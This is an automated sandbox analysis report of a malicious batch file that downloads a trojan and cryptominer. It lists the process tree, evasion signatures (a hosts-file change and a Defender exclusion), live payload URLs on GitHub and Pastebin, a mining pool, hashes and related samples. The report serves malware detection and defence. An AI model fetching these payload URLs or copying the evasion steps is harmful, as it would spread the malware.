Loading BitLocker PowerShell Module 27->122 37 conhost.exe 27->37         started        39 conhost.exe 29->39         started        41 wusa.exe 29->41         started        43 conhost.exe 31->43         started        45 conhost.exe 31->45         started        47 conhost.exe 31->47         started        49 2 other processes 31->49 file9 signatures10 process11 file12 76 C:\ProgramData\Chrome.exe, PE32+ 33->76 dropped 78 C:\Windows\System32\drivers\etc\hosts, ASCII 33->78 dropped 98 Multi AV Scanner detection for dropped file 33->98 100 Modifies the hosts file 33->100 102 Adds a directory exclusion to Windows Defender 33->102 51 powershell.exe 23 33->51         started        54 cmd.exe 1 33->54         started        56 sc.exe 1 33->56         started        58 8 other processes 33->58 signatures13 process14 signatures15 114 Loading BitLocker PowerShell Module 51->114 60 conhost.exe 51->60         started        62 conhost.exe 54->62         started        64 wusa.exe 54->64         started        66 conhost.exe 56->66         started        68 conhost.exe 58->68         started        70 conhost.exe 58->70         started        72 conhost.exe 58->72         started        74 5 other processes 58->74 process16

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            eshkere.bat16%ReversingLabsScript-BAT.Downloader.Heuristic
            SourceDetectionScannerLabelLink
            C:\ProgramData\Chrome.exe76%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Temp\1348.exe76%ReversingLabsWin32.Trojan.Generic
            C:\Windows\Temp\lhaqmlexwhjs.sys5%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            github.com
            140.82.121.4
            truetrue
              unknown
              raw.githubusercontent.com
              185.199.109.133
              truefalse
                unknown
                pool.hashvault.pro
                95.179.241.203
                truetrue
                  unknown
                  pastebin.com
                  104.20.4.235
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exetrue
                      unknown
                      https://pastebin.com/raw/FBXiGyZ9true
                        unknown
                        https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exefalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://github.com/fruktoozik/qnfr8Pwusa.exe, 0000000E.00000002.1624513920.000002844E6D9000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://github.com/fruktoozik/qnfr/rawfwusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.compowershell.exe, 00000003.00000002.1542373154.0000025701347000.00000004.00000800.00020000.00000000.sdmptrue
                                    unknown
                                    https://go.micropowershell.exe, 00000003.00000002.1542373154.0000025700C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://ocsp.digicert.copowershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://github.compowershell.exe, 00000003.00000002.1542373154.000002570160E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPsc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://ocsp.digicert.coductVersion124powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://raw.githubusercontent.compowershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://github.com/powershell.exe, 00000003.00000002.1564853812.000002576D6DD000.00000004.00000020.00020000.00000000.sdmptrue
                                                  unknown
                                                  http://ocsp.digicert.codpowershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.drweb.ru/1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://contoso.com/powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://raw.githubusercontent.compowershell.exe, 00000003.00000002.1542373154.000002570164A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://oneget.orgXpowershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.kaspersky.ru/downloads/free-virus-removal-tool1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://oneget.orgpowershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://crl.microspowershell.exe, 00000003.00000002.1568771405.000002576F85E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            95.179.241.203
                                                            pool.hashvault.proNetherlands
                                                            20473AS-CHOOPAUStrue
                                                            104.20.4.235
                                                            pastebin.comUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            185.199.109.133
                                                            raw.githubusercontent.comNetherlands
                                                            54113FASTLYUSfalse
                                                            140.82.121.4
                                                            github.comUnited States
                                                            36459GITHUBUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1528950
                                                            Start date and time:2024-10-08 14:01:17 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 51s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:52
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:eshkere.bat
                                                            Detection:MAL
                                                            Classification:mal100.troj.adwa.expl.evad.mine.winBAT@70/18@4/4
                                                            EGA Information:
                                                            • Successful, ratio: 25%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .bat
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target 1348.exe, PID 6592 because it is empty
                                                            • Execution Graph export aborted for target Chrome.exe, PID 1868 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 4872 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: eshkere.bat
                                                            TimeTypeDescription
                                                            08:02:20API Interceptor81x Sleep call for process: powershell.exe modified
                                                            08:02:35API Interceptor1x Sleep call for process: 1348.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            95.179.241.203C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                              PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                  66dd2c2d3b88f_opera.exeGet hashmaliciousXmrigBrowse
                                                                    gutpOKDunr.exeGet hashmaliciousXmrigBrowse
                                                                      SecuriteInfo.com.FileRepMalware.3253.21057.exeGet hashmaliciousXmrigBrowse
                                                                        sc7Qi5VdE1.exeGet hashmaliciousXmrigBrowse
                                                                          II.exeGet hashmaliciousXmrigBrowse
                                                                            E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                                                                              Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                                                                                104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                sostener.vbsGet hashmaliciousXWormBrowse
                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                envifa.vbsGet hashmaliciousRemcosBrowse
                                                                                • pastebin.com/raw/V9y5Q5vv
                                                                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                                                                • pastebin.com/raw/NsQ5qTHr
                                                                                185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                pool.hashvault.proGoogle Chrome.exeGet hashmaliciousXmrigBrowse
                                                                                • 45.76.89.70
                                                                                e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                • 45.76.89.70
                                                                                GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                • 45.76.89.70
                                                                                C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                • 95.179.241.203
                                                                                file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                • 45.76.89.70
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                • 45.76.89.70
                                                                                PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                • 142.202.242.43
                                                                                PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                • 95.179.241.203
                                                                                o9OIGsDt4m.exeGet hashmaliciousXmrigBrowse
                                                                                • 95.179.241.203
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                • 95.179.241.203
                                                                                raw.githubusercontent.compo 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.110.133
                                                                                invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.111.133
                                                                                Payment.vbsGet hashmaliciousFormBookBrowse
                                                                                • 185.199.111.133
                                                                                PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.108.133
                                                                                OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.111.133
                                                                                k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                                • 185.199.108.133
                                                                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.108.133
                                                                                PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                • 185.199.108.133
                                                                                Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.108.133
                                                                                github.comSecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                • 140.82.121.4
                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                • 140.82.121.4
                                                                                SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                • 140.82.121.3
                                                                                SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                • 140.82.121.4
                                                                                SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                                                                • 140.82.121.3
                                                                                na.elfGet hashmaliciousDeadBoltBrowse
                                                                                • 140.82.121.9
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                AS-CHOOPAUSGoogle Chrome.exeGet hashmaliciousXmrigBrowse
                                                                                • 45.76.89.70
                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                • 45.76.78.62
                                                                                SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                • 45.76.78.62
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 45.32.242.21
                                                                                e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                • 45.76.89.70
                                                                                GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                • 45.76.89.70
                                                                                C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                • 95.179.241.203
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 66.42.126.39
                                                                                z3hir.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 44.172.145.8
                                                                                arm7-20241006-0950.elfGet hashmaliciousUnknownBrowse
                                                                                • 108.61.212.64
                                                                                FASTLYUSFIR-069114.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                • 151.101.2.137
                                                                                https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                                                • 151.101.65.195
                                                                                sakuraGet hashmaliciousUnknownBrowse
                                                                                • 151.101.67.6
                                                                                https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                                                • 151.101.192.84
                                                                                po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                https://docs.google.com/drawings/u/0/d/1upFXiljnDLvdOIt1Aoe3r44ZCVNRtnjt0CV6fZcs1no/preview?usp=sharing&pli=1Get hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.66.137
                                                                                copyright_infringement_evidence_1.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                                                                • 151.101.194.137
                                                                                Audio_Msg..00293614554893Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                • 151.101.194.137
                                                                                CLOUDFLARENETUSGoogle Chrome.exeGet hashmaliciousXmrigBrowse
                                                                                • 172.67.19.24
                                                                                FIR-069114.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousPhisherBrowse
                                                                                • 104.17.25.14
                                                                                http://us-east-1.oortech.comGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                                                • 104.17.246.203
                                                                                PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.93.17
                                                                                http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                                                • 104.22.51.98
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.53.8
                                                                                Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0eJFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.109.133
                                                                                • 140.82.121.4
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Windows\Temp\lhaqmlexwhjs.sysGoogle Chrome.exeGet hashmaliciousXmrigBrowse
                                                                                  e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                    GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                      C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                        TwrhjEKqxk.exeGet hashmaliciousXmrigBrowse
                                                                                          aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                                                                            1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                                                                                              updater.exeGet hashmaliciousXmrigBrowse
                                                                                                7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                                                                                                  LnK0dS8jcA.exeGet hashmaliciousXmrigBrowse
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1348.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5288736
                                                                                                    Entropy (8bit):6.538032311597454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:yGp6tj9L5rremSnrC7ag91f3dOuyUPpSJawwSDJiRRiy5CevO+OGLUA:J6N96ut9xwUPpSDwMiRsKhhpX
                                                                                                    MD5:1A67A432E7AB0BCD2189F3F4142F2AE4
                                                                                                    SHA1:168307B08E5C7A740D7DFCAA4BE93E02F80E3FB9
                                                                                                    SHA-256:D19E4B7894FE7E6190D942C5718BB61B95B0FFD7380CB056891508CA6D163432
                                                                                                    SHA-512:F849EA7BA3BD6865935065D542247A9256C0CCC669F9F57639E44C374C4AA3B03FF4A33F956F6027CB5AA97069EC5B9EB943C1D57034CC7D9821F52F44FFDE9B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...!O.g.........."...........O.....@..........@..............................Q...........`.....................................................<.....P..)....P.......P. )....P.x...............................(.......8...............x............................text.............................. ..`.rdata...&.......(..................@..@.data....O.......O.................@....pdata........P......XP.............@..@.00cfg........P......ZP.............@..@.tls..........P......\P.............@....rsrc....)....P..*...^P.............@..@.reloc..x.....P.......P.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5288736
                                                                                                    Entropy (8bit):6.538032311597454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:yGp6tj9L5rremSnrC7ag91f3dOuyUPpSJawwSDJiRRiy5CevO+OGLUA:J6N96ut9xwUPpSDwMiRsKhhpX
                                                                                                    MD5:1A67A432E7AB0BCD2189F3F4142F2AE4
                                                                                                    SHA1:168307B08E5C7A740D7DFCAA4BE93E02F80E3FB9
                                                                                                    SHA-256:D19E4B7894FE7E6190D942C5718BB61B95B0FFD7380CB056891508CA6D163432
                                                                                                    SHA-512:F849EA7BA3BD6865935065D542247A9256C0CCC669F9F57639E44C374C4AA3B03FF4A33F956F6027CB5AA97069EC5B9EB943C1D57034CC7D9821F52F44FFDE9B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...!O.g.........."...........O.....@..........@..............................Q...........`.....................................................<.....P..)....P.......P. )....P.x...............................(.......8...............x............................text.............................. ..`.rdata...&.......(..................@..@.data....O.......O.................@....pdata........P......XP.............@..@.00cfg........P......ZP.............@..@.tls..........P......\P.............@....rsrc....)....P..*...^P.............@..@.reloc..x.....P.......P.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
